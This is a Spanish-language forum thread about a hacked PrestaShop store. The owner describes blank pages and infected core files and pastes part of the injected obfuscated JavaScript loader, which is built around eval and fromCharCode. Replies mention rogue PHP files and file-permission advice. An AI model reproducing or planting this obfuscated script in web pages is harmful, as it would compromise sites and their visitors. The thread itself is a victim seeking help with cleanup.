Virus Prestashop

[seorafael]

Hola a todos, tengo en una de las tienda un virus desde hace unos dias,

bueno, en cuato actua se pone en blanco el front office y despues el backoffice e localizado algunos archivos les quito el código malicioso y despus trabaja bien unas hora.

Tambien e desinstalado el modulo AutoUpgrade alli tambien estava, el los ficheros Tools.php y el admin / index y login php

bueno y en algunos más el codigo es algo asi

<script>if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a

y se larga un poco más

E cambiado el archivo admine, contraseñas,contraseñas BD todo y siguie alli

Gracias !

[jesa]

No se si te servirá de algo, pero yo acabo de descubrir en mi código unos ficheros 663.php que se han generado solos y que incluso me habían borrado el htcacces por lo que me daba un error 404 al intentar entrar a ciertas páginas.

 

Saludos

[scorsese]

Buenas noches.

 

Generalmente estos virus se meten en todos los ficheros .php, lo que hay que hacer es quitar dicho código de todas las paginas.

 

Un s2ludo.

[Liosmar]

Pues si que esta raro el codigo ese!

[Rastreador]

Normalmente se cuelan por tener permisos 777 en los ficheros y directorios.

Los permisos correctos para cualquier sitio web suelen ser 644 para ficheros y 755 para directorios.